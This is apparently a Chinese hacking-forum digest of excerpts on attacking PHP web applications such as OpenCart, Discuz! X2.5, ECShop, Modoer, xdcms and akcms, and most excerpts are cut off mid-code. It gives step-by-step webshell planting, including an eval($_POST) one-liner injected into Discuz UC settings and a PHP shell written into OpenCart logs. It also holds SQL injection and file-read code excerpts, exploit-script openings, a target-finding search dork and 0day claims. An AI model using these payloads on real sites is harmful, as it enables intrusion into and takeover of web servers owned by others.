Web安全
OpenCart 后台getshell
(脚本区不能发帖?)1,进入后台,点击system-Setting,在server选项下error.txt,改成1.php2,点击system-Backup / Restore选择一个纯一句话木马的sql文件,导入,选择Restore(还原)。会提示出错的,无法还原的。3,访问网址site/system/logs/1.php 就是一句话shell了。
最新xdcms_v2.0.2 0DAY
开始吧在留言的地方lists.php文件<?phpclass lists extends db{public function init(){$input=base::load_class('input');$formid=isset($_GET)?intval($_GET):0;$form_arr=base::load_cache("cache_form","_form");$form=get_array($form_arr,'id',$formid,0);$field=base::load_cache("cache_form_"
Anwsion(v1.1-Beta4) 注入
\app\home\main.php(85): public function explore_action() { // 省略........... By.Rices -> Forum: T00ls.Net -> Blog: Rices.so if ($_GET) { if (is_numeric($_GET)) //据说以前这里也可以注射 所以被isnum
phpstat 读文件
./count/count.com.php$website = $_GET;$image = $_GET;//确定图片if(!$image)$imagesrc = "../templates/".TPL_NAME."/".TPL_IMGDIR."/icos/countlogo1.gif";else$imagesrc = "../templates/".TPL_NAME."/".TPL_IMGDIR."/icos/".$image;//发送图片 header("Content-type: image/gif");readfile($i
ECShop <= v2.7.3 SQL injection / exploit
{:6_449:} 好像是最新的<?phpprint_r('+---------------------------------------------------------------------------+ECShop <= v2.7.3 SQL injection / exploitby 帅的一塌糊涂mail: hiqiushuiabc gmail dot comteam: http://hi.baidu.com/w5r2dork: "Powered by ECShop"+-----------------------
Discuz! X2.5管理后台uc配置 get webshell漏洞
首先,进入后台以管理员身份登录; 然后,打开站长→UC设置 看截图:在UC设置ip地址里面填写 经过处理的一句话如下 Madman\’);eval($_POST)?>;// QQ 然后保存即可。 连接地址:http://bbs.xxxxx.com/config/config_ucenter.php
补发20120407 Discuz! X2.5 远程代码执行漏洞及EXP[XDAY]
最近大家开始关注discuz了,由于之前t00ls关站好久,错过一些dz的漏洞,转载下。if(!defined('IN_DISCUZ')) {@@ -89,7 +89,7 @@}}if($searcharray && $replacearray) {- $content = preg_replace("/(.*?)|()|(\(\d+)\)/ies", 'helper_seo::base64_transform("encode", "", "\\1\\2\\3", "")', $content
Modoer EXP
声明:本漏洞是t00ls -- 大牛挖的!本菜自己需要用就写了一个!!<html><head><title> Modoer EXP </title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head><script language="javascript"> function expstart() { var url = document.forms.url.value; if(url !
Modoer 点评系统注射 几个版本通杀
不给力的注射, 搞某站挖的, 查了下没什么大站用这个 影响不大 发出来大家交流学习, 废话不多说, 看我们的猪肉点~~~~~{:6_409:}首先\core\modules\item\ajax.php开始调用~$do = trim($_GET);$op = trim($_GET);// 允许的操作行为$allowacs = array( 'respond', 'review', 'subject', 'picture', 'guestb
akcms代码执行漏洞
上周挖出的akcms的后台模版getshell感觉没什么新意,然后又仔细看了看代码,发现了一个比较有“前途”的洞,代码执行漏洞,而且出问题函数是作者提供给建站用户进行二次开发时使用的,也就是说这个问题放大的程度也会要大些。 0x01原理分析 漏洞问题主要存在于include\common.func.php文